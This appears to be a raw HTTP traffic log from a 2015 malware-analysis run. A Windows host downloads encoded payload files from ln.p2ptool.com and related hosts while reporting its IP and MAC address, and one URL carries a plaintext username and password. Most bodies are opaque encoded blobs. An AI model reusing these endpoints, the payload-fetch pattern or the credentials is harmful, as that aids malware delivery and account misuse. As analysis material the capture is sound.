User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:56 GMT

Content-Type: text/plain

Content-Length: 3476

Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT

Connection: close

ETag: "528f18cf-d94"

Accept-Ranges: bytes

/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Ye5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLEOnja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9hsubAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6dhDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMRhz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HVCyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 UIxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6psVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgILxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygNWYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55zwjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xavSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4nebyiCGAe8dJXk ozRC7esRpe37G1KTy67ti3mGCfv3XaFfzEDCXAQJDXzydYGwzFbufHoC6Oba8MBykz0IRvTgoHtzTpc3irGlZlpVdPKLzftyFBXGFSCa8DGCYXvpqdbfgQF2RpFckUmT01I13SJamGR957aQ7zoWd2xRg0TSaLDSO1iVXspPs40FHsQj/U4VK wzXHEoiyLu19qAK1imxhLpQKlr3uOju wkOjTY2vzdHLI3adsBo8YTrxVZb9db1HdkTNRFco46wqEOgw2Ieq jeNXWMXndNju7gbC3N7/5twJIkqZFt6MP8 y28KrDOB/DYFOHqYtthS4UvBZQwGyAukrufTRbs3BENArT3eDtQ2sAZJu2SAkVick9vQughZJetuuHbPMUbUJifqAy131nC6fgdmPhUNapajXDdjBC1GNg7iHk7hQ/w3CkcoEtqSGlGA49EyNV7bwAGoVc7x/Xb8eCvC/nt4eeGsW

<<< skipped >>>

GET /txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:30 GMT

Content-Type: text/plain

Content-Length: 111968

Last-Modified: Tue, 22 Sep 2015 02:26:44 GMT

Connection: close

ETag: "5600bc64-1b560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJX2G2Yw6VqVQ6FniCe06ZDVEnGhKZIy9GgiH6/wrMOvilrWtIoUgA8dl63vkFlYsv808n9xoPjKOkA0d9/AUDVLIWyJKGfQ30oQdaSw ooRKP3TITS70qtG23VOoAzU/dEk APRjAGee1kHoMkGXR442O5E7FXkFrE2s0NmUj5ay0C63Xri3dBEoYcUYdhA1na912G4GnwNPyGigPuwU4WnDUHq/HLA1JSzVcV7qGonkM3kaB6fPbglycn0DaQTrXm/H8aJaRsqeb8fxolpGypNTPeVZu3tFqtj4tOAGKUF sMaJudVXlW6wxom51VeVZRJhvIVRruRJIWa4B0YS20w3O2oa8Ns9uggHzpTR0yccTazQ2ZSPlrxNrNDZlI WvI/pOICuWZe8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziG LTy9adcaKIsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ75v2Ipn 4qo34DqKck/Lvt8TazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAJO4gv6AT3UO7thRRNagkrE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oQQoy6/oPEBqxo0 qZuAtWoPgJ yR1ZwZZREMMJf0vpc4SZ8ce zsmIwA6jAbzQgABzIbqI92FStTOY2Qoonvg2rVGp Dwvn3pFK8vui2f77PmI XJuiyzi0Zkkx56pL9K75Mk7A9r648UKKHO63ouLGnQi8l0bpnC5T0Yty5kQ4Ods4aXXBrdpBepmeh2dZe/TnDXSN51O5

<<< skipped >>>

GET /tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: update.down123.net

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html; charset=gb2312

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.6

Date: Wed, 11 Nov 2015 11:17:50 GMT

Content-Length: 1

1....

GET /deploy.php?ConFig=xz9 HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Accept: */*

Host: update.down123.net

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.6

Date: Wed, 11 Nov 2015 11:17:50 GMT

Content-Length: 2

9eHTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/7.5..X-Powered-By: PHP/5.3.6..Date: Wed, 11 Nov 2015 11:17:50 GMT..Content-Length: 2..9e..

GET /txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:41 GMT

Content-Type: text/plain

Content-Length: 433608

Last-Modified: Fri, 06 Nov 2015 14:22:14 GMT

Connection: close

ETag: "563cb796-69dc8"

Accept-Ranges: bytes

<<< skipped >>>

GET /plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: plus.zzinfor.cn

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 11 Nov 2015 11:18:03 GMT

Server: Tengine/2.0.3

Content-Type: application/octet-stream

Content-Length: 1549

Expires: Wed, 11 Nov 2015 11:18:03 GMT

Cache-Control: max-age=0

X-Via: 1.1 bl15:2 (Cdn Cache Server V2.0)

Connection: close

....<.......`-8...\.Q...V.i..`-*......................-................................................T.......................................................................................]...`..........a....a..<....h2zov."uu&e9".z-...B....WJB.E.MYNjDn..Bok"atvxvu(r.RY._Q.C2:/|lK.....k....p...0j...)...$...zV....................,.../p9*t?..'XVI.AoFGP..Y......WW]*|(:n.BUG82qyb...................`...`..._..Z.sE. d.....9....gO.....YV.ZM.".G>....P..5ng._......V..scJ..]..rfgw 4#='F.N5m;zr=o0\.....h...D...R..#.........-_.....D,.14#q>y)[t3#4=tQ.4............................................................j...........".4..0L....A.....U/w< >q`y(W.7..2jzU5...I}!{2&dNk$re, .;t>w*#h7rz4 #}w"p{WWAZ.t!4A5f:2=#\LG.......h....E..K......W.0...!......ER5'.W..C1)5dN ."2H4............................................................f.......T..:._...\.r*.........................3...H.UD8i..80}g=lp^..GL@.4( 4w! 9. zD0=$74a{>&y(92}D.S.....c...P(...v..P.Yr.U....".....................2...|lkz!$ME..&yjz3/he#. D...W.IFE.R6)Y._P\...d...A.)>.....q...`.!....7.&.Vz...Y.Y.....vuH..R.P...5q}LR{f%ybV< ...a?ud.I&'..]G.]so(%.t}34...^..)h<i..X....Nqm..../ty~n.... {:h.sl...L........&h..|@.V$7......Fw6b4$.;.W!.SIzw=;tb~1.3...`2}%&d..AJ^Fw1"..^.1=a^.D...IYT. Y..YF.J..\....(i]{.....X...`...F.S......h.4..B.....O...I'...2-.....................................................]...`U..)..oe..=..p...u.......,6R,(n].`,...<, :ad..RGf9*:so(%cM`.MIY[E.ZM,W:j;x2;*....5....{mqdV.].......%.. Fm..o...........UMZ..&<0dV.X.V..&

<<< skipped >>>

GET /txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:30 GMT

Content-Type: text/plain

Content-Length: 3681632

Last-Modified: Wed, 11 Nov 2015 06:37:41 GMT

Connection: close

ETag: "5642e235-382d60"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu7vg7o4OGLvAksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnK8LkCEjjVuY w9ubR7oMGJYDX66FKP95lKsnSGyzq37ryciPXfvjMPpcqzf2tJHexhfLNc fok6tpr37HNZkoDA9b8f9QQXkBG dX3CMR0/NFCP83aLsI5BiAzHCQ3JAlQ4FJlQ856TPZm3LkrIF6N30ifaKq p83E2s0NmUj5a X5Vy1wuSR9dWtS4hPXoQyM IdytADpRVo8JE43dQFFipIaFHMmto3ZU4PHim6WzGQ7DQYttXN9lycn0DaQTrWJvgEYtUqAbYm ARi1SoBt9qL31Z27Nj27cK3hD49V5esMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrCvj4xkq/yU dGfvGf0Yne8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a94BsqzULTQfxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay2oS4kGYrQWxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlr6BDvLF8pk6 P0P g8Q5mb8w4icKoxcxNrNDZlI WsxOHUkBOoRd2lephKWY2T1ZZGE77pEw2mANord1TbnucTazQ2ZSPlr6pKcJrWMBIP1qhO0HLK1lmKAsO86F254kLg6MOgYGj/E2s0NmUj5a3C2I9Jaq5QiP0ady7illljiF3sq2aCnyzX0okfCmeuexNrNDZlI WvqkpwmtYwEg8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a9SIyelpSHqnq1q0Btc2nwSKz5eXbq 3w0SO47vccmRiCV8k2Qip9g2z6Qsnr5fEBHZURWDBkbGIFM2XpBtTMgGe6Uq978GK26oCTYylcPSYk0BRHzuKCIFn44m2tyaRZ1koSJZKpXd/OHf 9s28bCOsp5XACOqJfX5nhXmBTF9k

<<< skipped >>>

GET /txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:56 GMT

Content-Type: text/plain

Content-Length: 1594720

Last-Modified: Mon, 27 Apr 2015 08:27:28 GMT

Connection: close

ETag: "553df2f0-185560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wvq/lGe PyKoQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnIwdeoQ/p3LZzBo/F8sBT14gU gqvqaR HsRQ0eMlj6jyfjxN Sljm4uxTQeIsstKIgXEZuNNwlSFWZ/Ocl6ajVqrL9FP48YRqiB3vEjm3LlLBj8CmI5HI0dvaAgvZkgrkgBNIKspJzspbEiSObNPaK3flTHHFmlFfE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WuxjdyElk00EWwpPpmkWxL592DT6wOksX0Rk/JftCpZs7/GFJwYdLxNbjVKk 3PqZ6J LJTSAQIz5cnJ9A2kE61ib4BGLVKgG2JvgEYtUqAbeDk35AUHl73tufks1XoWabrDGibnVV5VusMaJudVXlWUSYbyFUa7kTE2s0NmUj5ayjiTpfmIKRl2EZHKlVEuV3E2s0NmUj5a8TazQ2ZSPlr8q6ATLe0BDo1vFqnvbGZ3MTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvTu7cpOA81gl3prqnwQ6ppxNrNDZlI WvE2s0NmUj5a gQ7yxfKZOvo8xQR0ILcHUY4PBMHSsLbMTazQ2ZSPlrMTh1JATqEXdpXqYSlmNk9QYrGSLdEvLVSBJ/sSRlK6PE2s0NmUj5a qSnCa1jASD9aoTtByytZaZMFVEBXlS//3riYRXWEIuxNrNDZlI WtwtiPSWquUIrkSjdIyYLDPA9nNBCdKOkm/hbVWe7aCN8TazQ2ZSPlr8/NtRTCxZ I/Rp3LuKWWWBOVAnZ1Gp5T936SD5tpBgXE2s0NmUj5a qSnCa1jASD 8BgGQTR5rXlvLiHdduaD uVnYBpGHdzxNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a n PLUdYAM7u6dY8N0fVQjTBg4AZJAmXzAWuIVAOwWVRWgwWG/PzhWCZHG4tjpXwY8EePoyNjE9bQuOOiksOFys92Mb990zgH 9dcpHTN4oJH82bDLsUnnb8xYIKL6268 iq1CD6QKcyoahwQZemE7qDQdPE4 6Ew1OPiQ9gr3A

<<< skipped >>>

GET /txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:48 GMT

Content-Type: text/plain

Content-Length: 2198880

Last-Modified: Thu, 18 Jun 2015 01:46:51 GMT

Connection: close

ETag: "5582230b-218d60"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnL k7DvPs3WjXk7SpQ15d7jJanjjC84vAhwYDSjOYxjLntlYG xDPkOtcC9tO841wTXAMmIvkygIBtWwdDYF4q5XRI7ZGVRlWYksgPP6AN16z9g/z8gXEfKLrJrovlO7LE2s0NmUj5a8TazQ2ZSPlr5flXLXC5JH2opEaPJrOTroz4h3K0AOlF0xwWtDAuHIW wHOn1s4MYbXo/OU7PvgNsuRvGWEC5TiXJyfQNpBOtYm ARi1SoBtib4BGLVKgG3Cfiy1bVioF8cfi/GUwqfa6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WsiuRd8jl1vezouKXPQhqxaxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvdYieTWj/98sTazQ2ZSPlr9t4Tl IHES7E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr9ayT1Lrtc3gKkE5OkoGqK/E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPXF8/zuqkGzfJgvhj6kGQ08xNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW8f8VESpL8m4dJnx/A/B6/8TazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWJ3t6N9bK/kMm1FSikOKLpHE2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5DV89XbEJ50B10OT1XCNS8KQo3SDfccki1K0oMuEGS FKNR1Tqt32KnQRoV7CxP OdSc2AQjQ4eTNulgi4jGACKspxO5/VLgi5B1WxoKLegzIDHLzyxyGKsgm6nQO23QwErsKmAX434bv0We9PqRZmUZ Y19 ufMHLyQ0YFPMVj

<<< skipped >>>

GET /txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:34 GMT

Content-Type: text/plain

Content-Length: 247176

Last-Modified: Wed, 04 Nov 2015 14:11:46 GMT

Connection: close

ETag: "563a1222-3c588"

Accept-Ranges: bytes

fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROpmsCvGM4F5O 0H8fI6LU0SnT9JQBtwTKo isNVtIVfyikHs314aQEo8WnGgaYNOYti7JbybwbjXtDLUztYgLDGYIyvVpneJpjxacaBpg05hHqQn0vWUMNAxHJLkgqqbtXsWSFpCFXznYaWnJyiqVTQYisCkYbszfjxacaBpg05i2LslvJvBuNf5/ 1gVd/aPFaicSzkOlLdWu16IMN5EZPSbAmHPWu2VwxKdPaxzM4ARzYrMdK4Wgapq7QaHDbBH9YOLT4VPwHfkN9pOcSW92/ H/y8AHjmYlX5LzBPSWrCqau0Ghw2wR7kX31v3lmcY/EeR7wuX05CO1w7MsCkWC/YpWIYAC31vP0zvj66M6MasC9rb4ePfGm1fp/9EdCb4jnBaoIWSy03YRRfh6CNlJDNv8 xdd0TLy7oI1BJLIN0CKwrGLQpTsLJtPHh85eLwE67KQoPir eXUwtsLHqK/MMRdAUG3dt3mKZVGBprisj6ATJ0Pz1T0J1YUMOTo3T5veee2A6MjQcNJgZyTHURsPxuw/bfnjUXiHx7L/Gsjldgifr6FBvzIp7Oll4I4yBYQLLDOhQE03YcR1OIgCF2eyAUtqVkwDf4/YP3OWe5YCxb0/YljczczPctBAhbjUDsvMrryXPKjJxJ3I33F/4UdU1N3e0DlO1FiXfjISZZCN/26i/6qcqiLFbQ6HCc4z7Iol75n6dLEkiVAWvLmEXezW23xsVS5EQhw5qOejY4ZYfmAV i0kvP0B68M9BcjQNaY0cbtKVkPGYW8c8XA0DXy1vj65gYfuA4cdxlJblUtd1g6QEX4DmoAWWbV7isPPspjY7MPehWqjDK0uJdU8znJKqgWb0Bo ydstzUbnzYc8fqIB2qZ3Wvg7T m2uQMJX1Wp/A0QXR9fvb6am/3VfiqQNIq BjFmOf3Q1Z 7vLpgNgFmUb8hblEqwCYKxJdChUOYzpOrPssFok3SoqjajGVW8icwZ4oqcgwoVWldF61vikzxRKZTYg vnyku5NNfvVoh/VyXuYcZDDE3aiauCeIvQof5wCjDRqb8TnP4LYC /waDknwVWNsbtz2QQdajxUpR5AlhMsgfCOWEBw5Xn/OB9RWfAB4dDmsvYR0z2VvfKH3pLD685Vdc4Orc9IR7Q5D6MqT5ItJJ0qtpHmG1gs3lYwkSwCX15xZ2xRW2vOixgQjGOi2IHE8d0VuddZvqrbbaPHyRN35DnmvT6xagZIbDBWNAHqNUKZcBcVr5/MDM3UVz2SuRPhEwtjkQRnvQ4nBh4eP7sHKkDpGa4mHrr8/xvj9jPDHw/Mjl6RXtxu2cXzLjCLiPbgmKpv9nXFhvvB/zZqMDsH27jObAFz6WviISiEmy2BrFKcCAv8GKvty 7XkKg/YWMNT/nyku5NNfvVZHKSiDqAZaxRoqcW57iew5/5lNjMkm6/uAMcPA58c9DJg4zDj5Sv5ClmIuib87U6khvN9v49V/2PxjmnEn6uEEtkN1NP9JWy

<<< skipped >>>

GET /txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:30 GMT

Content-Type: text/plain

Content-Length: 684044

Last-Modified: Wed, 24 Jun 2015 10:44:45 GMT

Connection: close

ETag: "558a8a1d-a700c"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvAblegbVkE3QksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnL8sFrZ6ScHQdh2Uj5tr5A5VTJW5rSxUYwBJJMoO9Bc7sUyLDFIXqMZC3CgFBCbdFr0sWYbC8Wp6yQl26h5WnPxqBJNc UpnuDjERuftzRF72x3xK DN ZbpznHoTXLxPSRe5YgD72LMOyEo87S0SemMaVw3Z/FrdteueXiWsJQ9C979Xf4K83Kpmj7WLBdPjjE2s0NmUj5a8TazQ2ZSPlrueKHSyn HxKvNkFlBxUMrfdg0 sDpLF9wjBVspUOVn3e28nV1s3Q7uOGK1sSqvG9kjmdVnettaSXJyfQNpBOtSscWDuPDWx/KxxYO48NbH8rmvTShj4cTdlVvCrfQXkn6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI Ws2WyVSGWEulsKFk4YKyzx6xNrNDZlI WvE2s0NmUj5a5sWWGLR964b7hS7RjImYJXE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrMjKhtrhBipDE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr/hZOVmqZR7/0iNwSnoKul3E2s0NmUj5azE4dSQE6hF3aV6mEpZjZPVy63fWnEfdS 3vHuuOQ4TExNrNDZlI WvqkpwmtYwEg/WqE7QcsrWW9dWmDiOWWmddr2GhIVxawMTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWBI02AJZ6GJA0W7tytP5KGfE2s0NmUj5a qSnCa1jASD 8BgGQTR5rWmfMTRPQazMr mYkEn66z9xNrNDZlI WtlbVeP21o8lsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a95/gHbcC4GpNQ3 Tprub/0qNmMz6EuD7Cg5inGUJPrRG1ClRSFTzMFAEeqUxqf27BGiNZi64DKJkdCYX9TpG9uMD4Lptj4WXAs bfBiT1frx9VPKf8j9WkIkNe1I5ALdTC853zptdWa5CuLWMJel0Z2iy/UtuZhx3gHo4aZnsQ

<<< skipped >>>

GET /txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 HTTP/1.1

